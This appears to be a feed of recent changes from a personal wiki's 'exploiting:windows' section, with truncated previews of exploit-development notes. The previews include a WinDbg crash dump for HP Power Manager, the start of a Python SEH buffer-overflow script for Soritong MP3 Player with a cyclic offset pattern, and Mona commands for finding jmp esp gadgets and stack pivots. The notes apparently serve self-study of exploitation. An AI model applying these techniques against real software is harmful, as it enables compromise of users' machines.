E-Bärs Xopedia - exploiting:windows

E-Bärs Xopedia - exploiting:windows https://www.xn--e-br-noa.de/ 2026-04-11T08:51:46+00:00 E-Bärs Xopedia https://www.xn--e-br-noa.de/ https://www.xn--e-br-noa.de/lib/exe/fetch.php?media=wiki:dokuwiki.svg text/html 2019-05-07T13:48:51+00:00 Anonymous (anonymous@undisclosed.example.com) HP Power Manager https://www.xn--e-br-noa.de/doku.php?id=exploiting:windows:hppowerman&rev=1557236931&do=diff HP Power Manager Crash (c74.60c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000041 ebx=0088963b ecx=0018f4c8 edx=00190000 esi=0018f280 edi=0018f4c8 eip=76c3c886 esp=0018f20c ebp=0018f218 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 msvcrt!_get_printf_count_output+0x2e: 76c3c886 8802 mov … text/html 2019-07-27T19:23:12+00:00 Anonymous (anonymous@undisclosed.example.com) Soritong https://www.xn--e-br-noa.de/doku.php?id=exploiting:windows:soritong&rev=1564255392&do=diff Soritong #!/usr/bin/python #Soritong MP3 Player 1.0 SEH BOF path = "C:\Program Files\SoriTong\Skin\Default\UI.txt" #pattern = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2… text/html 2019-05-07T13:42:30+00:00 Anonymous (anonymous@undisclosed.example.com) Windows Software https://www.xn--e-br-noa.de/doku.php?id=exploiting:windows:start&rev=1557236550&do=diff Windows Software Windbg + Mona Program Files (x86)\Common Files\microsoft shared\VC>regsvr32 msdia90.dll \Windbg86>symchk /r c:\windows\system32\ntdll.dll /s SRV*c:\symbols*http://msdl.microsoft.com/download/symbols .load pykd.pyd !py mona modules !py mona config -set workingfoler c:\_c\mona !py mona.py find -s '\xff\xe4' -m # ffe4 -> jmp esp mona.py stackpivot -distance 2221,2800 # 0x0044adec : {pivot 2260 / 0x8d4} : # MOV DWORD PTR FS:[0],ECX # ADD ESP,8D4 # RETN ** [DevManBE.exe]… text/html 2023-03-19T13:32:35+00:00 Anonymous (anonymous@undisclosed.example.com) WinDBG (Preview) https://www.xn--e-br-noa.de/doku.php?id=exploiting:windows:windbg&rev=1679232755&do=diff WinDBG (Preview) lm ? @$exentry bp @$exentry Make sure if you have the correct breakpoint address issue lm an exe without symbol will be shown as 0:000> lm start end module name 00400000 0040f000 image00400000 (no symbols) compare the NtHeader->AddresssOfEntrypoint with @$exentry 0:000> r $t0 = image00400000 0:000> ?? ((ntdll!_IMAGE_NT_HEADERS *) @@( poi( @$t0 + 0x3c ) + @$t0 ))->OptionalHeader.AddressOfEntryPoint + @$t0 unsigned int64 0x401280 0:000> ? @$exentry Eva…